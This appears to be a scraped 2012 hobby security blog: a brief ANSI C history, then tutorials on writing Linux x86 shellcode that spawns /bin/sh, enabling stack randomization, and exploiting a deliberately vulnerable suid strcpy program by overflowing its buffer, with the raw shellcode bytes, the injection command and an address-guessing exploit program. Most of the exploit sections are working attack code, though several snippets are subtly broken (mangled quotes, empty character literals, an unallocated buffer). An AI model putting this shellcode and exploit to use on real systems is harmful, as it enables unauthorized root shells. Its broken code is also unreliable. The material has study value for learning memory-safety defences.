American National Standards Institute C (ANSI C)

Ken Thompson and Dennis Ritchie

By saying ANSI C, we mean all families of standards for C programming language that had been published by the American National Standards Institute.

#In 1983 (C89)

  • Known as ANSI X3.159-1989 “Programming Language C and also ANSI C.

#In 1990 (C90)

  • It’s just a C89 plus few modifications, also known as ISO/IEC 9899:1990, and adopted by ISO organization.

#In March 2000 (C99)

  • Known as ISO/IEC 9899:1999, and also adopted by ISO organization.

#In December 2011 (C11)

  • Known as ISO/IEC 9899:2011, and the current standard for the c programming language.
Categories: c programming language Tags: ,

Shellcode : Spawning a Shell

The easiest way to be able to write a shell code is to follow these steps:

1- Write your shellcode in high- level programming language and compile it.

2- Use any debugger you want to disassemble the compiled code (GDB).

3- Try to understand how the code works

4- Try to make the assembly simple and simple again.

5- Use objdump utility to generate opcodes(machine instructions in readable formate).

So, let’s try to begin write our shellcode in c language, the comments i wrote ‘ll be helpful to make life easier.

int main(void){
char *array[2];

array[0] = “/bin/sh”;
array[1] = ”;
/*
* execve syscall takes three arguments:

*  – Pointer to the executable file name
*  – Pointer to array of arguments
*  – Pointer to array of (form key=value)
* */

execve(array[0], array, 0);

return 0;
}

After we wrote the shellcode in high-level language, compile it, then we should use GDB to disassemble the compiled code to understand what’s going on.

0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x20,%esp
0x080483cd <main+9>:    movl   $0x80484c0,0x18(%esp)
0x080483d5 <main+17>:    movl   $0x0,0x1c(%esp)
0x080483dd <main+25>:    mov    0x18(%esp),%eax
0x080483e1 <main+29>:    movl   $0x0,0x8(%esp)
0x080483e9 <main+37>:    lea    0x18(%esp),%edx
0x080483ed <main+41>:    mov    %edx,0x4(%esp)
0x080483f1 <main+45>:    mov    %eax,(%esp)
0x080483f4 <main+48>:    call   0x80482fc <execve@plt>
0x080483f9 <main+53>:    mov    $0x0,%eax
0x080483fe <main+58>:    leave
0x080483ff <main+59>:    ret

I wont explain this output, it’s very easy to understand, so i ‘ll let you try to understand it, but we must know, that if we want to write a flexible shellcode (based on relative addressing not hardcoded one) we should use a register the represent the base register to us (in our shellcode ‘ll be ESI), and then uses offsets from it, so let’s see the scenario ……

This image explains every thing i ‘ll speak shortly (1 image = 1000 words), so let’s take a look at our shellcode that written to be flexible and injectable.

.text
.global _start
_start:

jmp MyCall
shellcode:

popl %esi               # ESI points to our target string
xorl %eax, %eax         # EAX filed with Nulls
movb %al, 0x7(%esi)     # Terminates our target string with null
movl %esi, 0x8(%esi)    # Move the address of our target string to argv
movl %eax, 0xc(%esi)    # Move set of nulls to envp

movb $11, %al           # Move syscall’s number 11 to the first 8  bits of EAX
movl %esi, %ebx
leal 0x8(%esi), %ecx
leal 0xc(%esi), %edx
int $0x80

MyCall:
call shellcode
MyTarget:
.ascii “/bin/shABBBBCCCC”

as shown in the previous shellcode, i had added comments to to help you to understand the steps we did, but i ‘ll list the steps also:

1- Fill EAX with nulle (by using xorl instruction)

2- Terminate the string “/bin/sh” with null by moving 8 bits of null from EXA to the ‘A’

place holder.

3- Copy the address of the string from ESI to EBX.

4- Copy the value of EAX over ‘BBBB’ place holders.

and so on, so here we seen the basic concepts to write an flexible and injectable (Not contains null values to be able to injected), so i advice you to try and try and write your own shellcodes to be a great shellcoder.

Categories: Linux, security Tags: , , , ,

Enabling stack randomization in linux

 

One way to make the process of exploiting buffer overflow vulnerabilities harder is to enable stack randomization feature.

In case of disabling stack randomization features, it’s so easy for the hacker to guess the address of the first instruction  in the shell code based on the offset from the beginning of the stack, so that to make the life  harder to the hacker (not good ones) we ‘ll enable this feature as shown below:

sysctl -w kernel.randomize_va_space=2

So, if we write a small c program to return with the address of the top of the stack,

#include <stdio.h>

unsigned long topOfStack(void){
__asm__(“movl %esp, %eax”);
}

int main(void){
printf(“%x\n”, topOfStack());
return 0;
}

and then run it more, the result ‘ll be as shown:

865198e0
a806d0b0
5fffb230

and so no.

Categories: Linux, security Tags: , , , ,

How to guess the address of your shell code ?

April 27, 2012 Leave a comment

Usually, when we want to make any vulnerable program to execute our shell code that we had identified before, we face the problem of how to find the address of the first instruction in the shell code, the programmers had found a lot of methods for doing that, but we ‘ll focus on the popular one “guessing the address of the shell code“.

Because of knowing the start of the stack for every program (Not always), we can guess how far our shell code is.

simple program for retrieving the value of ‘ESP’ register

#include <stdio.h>

unsigned long topOfStack(void){

__asm__(“movl %esp, %eax”);

}

int main(void){

printf(“%x\n”, topOfStack());

return 0;

}

Now, we ‘ll try to create an vulnerable program, make it owned by root, make suid bit on, and then try to exploit it and spawning the shell.

Simple vulnerable program

#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{

char little_array[512];
if (argc > 1)
strcpy(little_array,argv[1]);
}

The first thing we should do is to find how far the return address is, so i ‘ll use the $(printf “”) expression to redirect the output of the printf routine as an command line argument (input to our vulnerable program). we should know to overwrite the return address, we should redirect at least 512 bytes as input, so let’s try to guess:

./vulnprog $(printf “%0512x”)

./vulnprog $(printf “%0524x”)

Segmentation fault

So we have concluded that the return address begins from the byte 524 (till byte 528), now we ‘ll inject the shell code using printf routine.

Simple shell code for spawning the shell

“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0
b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x6
9\x6e\x2f\x73\x68”

shell code (40 bytes) + (484 bytes) of zeros + New RET address

So the final form is:

./vulnprgo $(printf”\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\x00\x00\x00\x00″)

Now we ‘ll look at the program to guess where the first shell code instruction is.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define offset_size 0
#define buffer_size 512

char sc[] =
“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”
“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”
“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;

unsigned long find_start(void) {
__asm__(“movl %esp,%eax”);
}

int main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=offset_size, bsize=buffer_size;
int i;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);

addr = find_start() – offset;
printf(“Attempting address: 0x%x\n”, addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(sc); i++)
*(ptr++) = sc[i];
buff[bsize – 1] = ”;
memcpy(buff,”BUF=”,4);
putenv(buff);
system(“/bin/bash”);
}

Resources:

  • Smashing The Stack For Fun And Profit
  • The.Shell coders Handbook

Hello world!

April 27, 2012 1 comment

Welcome to WordPress.com! This is your very first post. Click the Edit link to modify or delete it, or start a new post. If you like, use this post to tell readers why you started this blog and what you plan to do with it.

Happy blogging!

Categories: Uncategorized
Follow

Get every new post delivered to your Inbox.